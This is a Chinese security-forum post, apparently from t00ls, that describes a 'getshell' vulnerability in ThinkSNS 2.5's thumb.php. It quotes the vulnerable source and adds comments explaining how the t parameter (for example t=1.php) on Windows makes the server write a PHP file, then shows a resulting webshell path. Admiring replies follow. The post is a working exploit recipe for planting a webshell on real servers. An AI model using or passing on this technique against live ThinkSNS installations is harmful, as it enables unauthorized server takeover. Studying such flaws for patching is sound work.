Thinksns 2.5 getshell
根目录 thumb.php
看代码
<?php
/*
* 自动缩略图 参数 url|w|h|type="cut/full"|mark="text/image|r"
* thumb.php?url=/thinksns/data/userface/000/00/00/41_middle_face.jpg?1247718988&w=20&h=20
*/
error_reporting(0);
set_time_limit(30);
$biggest_memory_limit = 256; //单位M,后缀不要加M
//全局定义文件
//require 'define.inc.php';
//临时目录
$tempDir = "./data/thumb_temp/";
checkDir($tempDir);
//分析URL
$url = urldecode($_GET['url']);
$url = preg_replace('/(.*)\?(.*)$/','$1',$url);
//XSS脚本攻击探测
//include THINK_PATH.'/Vendor/xss.php';
//DetectXSS($url);
//2009-10-7 修改 将本地图片修改成相对地址,避免file_get_contents不能读取远程文件时出错(可修改php.ini 设置 allow_fopen_url 为 true)
//$url = str_ireplace(SITE_URL,'.',$url);
if(file_exists($url)){
$url = $url;
}elseif($result = GrabImage($url,$tempDir)){
$url = $result;
$grab_temp_file = $result;
}else{
$url = "./public/images/nopic.jpg";
}
//解析参数
$w = $_GET['w']?$_GET['w']:'100'; //宽度
$h = $_GET['h']?$_GET['h']:'100'; //高度
$t = $_GET['t']?$_GET['t']:'c'; //是否切割
$r = $_GET['r']?'1':'0'; //是否覆盖
//目录名hash
$fileHash = md5($url.$w.$h);
$hashPath = substr($fileHash,0,2).'/'.substr($fileHash,2,2).'/';//文件名和目录 第一个目录是md5之后的前俩位,第二个目录是3,4位
//缩图目录
$thumbDir = "./data/thumb/".$hashPath;
checkDir($thumbDir);
$tempFile = $tempDir.$fileHash.'.'.$sourceInfo['type'];
$thumbFile = $thumbDir.$fileHash."_".$w."_".$h."_".$t.'.'.$sourceInfo['type']; //文件名的设置,w h t都是可控制的。。 sourceinfo未定义过所以为空 Ps:在windows里 创建1.php.的文件 最后一个.会被忽略。。so 控制t=1.php 即可,windows
$img = new Image();
.....
//不存在输出
if(copy($url,$tempFile)){ //复制文件到temp..
.....
}
if($info[0]<=$w && $info[1]<=$h){
copy($tempFile,$thumbFile); //复制到最终
$img->showImg($thumbFile,'',$info[0],$info[1]);
unlink($tempFile);//删除零时
unlink($grab_temp_file);
exit;
}else{
?>
shell:xxx.xxxx/data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php
测试。。
评论35次
最近也在猛学PHP 漏洞挖掘,lz是大牛,必须膜拜
又可以学xi了 爽爽~~
感谢楼主,来学xi下。
温故而知新。
分析得很到位。。。
膜拜楼主挖洞牛
Sublime text
膜拜大牛
好友洞 牛。。
忠心xi望t00ls恢复当日的辉煌
拿来学xi下,每个洞洞都是不一样的泀洞
又见窟窿,抱走抱走~
这个GETSHELL有学xi的必要```
支持!
发一个就少一个了。。
求编辑器的名字。。
这个洞我喜欢 啊 啊
都是洞牛啊!!
GETshell帝
这个 说实话没看懂。。。